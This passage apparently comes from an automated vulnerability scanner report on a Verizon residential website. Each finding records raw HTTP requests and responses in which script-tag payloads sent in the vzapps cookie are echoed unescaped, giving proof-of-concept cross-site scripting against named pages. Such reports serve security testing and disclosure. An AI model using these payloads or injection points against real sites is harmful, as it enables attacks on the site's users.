GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX44fe0<script>alert(1)</script>68099989e89; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77790
Expires: Sat, 20 Nov 2010 02:05:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX44fe0<script>alert(1)</script>68099989e89; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX44FE0<SCRIPT>ALERT(1)</SCRIPT>68099989E89 </DIV>
...[SNIP]...

1.81. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 590bb'><script>alert(1)</script>7ce8b385b74 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX590bb'><script>alert(1)</script>7ce8b385b74; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 02:05:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX590bb'><script>alert(1)</script>7ce8b385b74; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:10 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX590BB'><SCRIPT>ALERT(1)</SCRIPT>7CE8B385B74 ' />
...[SNIP]...

1.82. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 81b88<script>alert(1)</script>2530e13d834 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX81b88<script>alert(1)</script>2530e13d834; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109112
Expires: Sat, 20 Nov 2010 02:03:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX81b88<script>alert(1)</script>2530e13d834; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX81B88<SCRIPT>ALERT(1)</SCRIPT>2530E13D834 </DIV>
...[SNIP]...

1.83. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5fc02'><script>alert(1)</script>6248ef31c2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5fc02'><script>alert(1)</script>6248ef31c2c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110658
Expires: Sat, 20 Nov 2010 02:03:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX5fc02'><script>alert(1)</script>6248ef31c2c; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5FC02'><SCRIPT>ALERT(1)</SCRIPT>6248EF31C2C ' />
...[SNIP]...

1.84. http://www22.verizon.com/Residential/FiOSTV/Overviewab/Overviewab [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overviewab/Overviewab

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7846b'><script>alert(1)</script>c29d6df2ef0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overviewab/Overviewab HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7846b'><script>alert(1)</script>c29d6df2ef0; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110648
Expires: Sat, 20 Nov 2010 02:05:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX7846b'><script>alert(1)</script>c29d6df2ef0; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:47 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7846B'><SCRIPT>ALERT(1)</SCRIPT>C29D6DF2EF0 ' />
...[SNIP]...

1.85. http://www22.verizon.com/Residential/FiOSTV/Overviewab/Overviewab [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overviewab/Overviewab

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2cddd<script>alert(1)</script>480f006356b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overviewab/Overviewab HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2cddd<script>alert(1)</script>480f006356b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110644
Expires: Sat, 20 Nov 2010 02:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX2cddd<script>alert(1)</script>480f006356b; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2CDDD<SCRIPT>ALERT(1)</SCRIPT>480F006356B </DIV>
...[SNIP]...

1.86. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8a2f3<script>alert(1)</script>10518240ffc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX8a2f3<script>alert(1)</script>10518240ffc; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129772
Expires: Sat, 20 Nov 2010 02:03:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX8a2f3<script>alert(1)</script>10518240ffc; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8A2F3<SCRIPT>ALERT(1)</SCRIPT>10518240FFC </DIV>
...[SNIP]...

1.87. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b725'><script>alert(1)</script>adf7dee168d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2b725'><script>alert(1)</script>adf7dee168d; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129776
Expires: Sat, 20 Nov 2010 02:03:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX2b725'><script>alert(1)</script>adf7dee168d; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2B725'><SCRIPT>ALERT(1)</SCRIPT>ADF7DEE168D ' />
...[SNIP]...

1.88. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e64e0'><script>alert(1)</script>02959857add was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
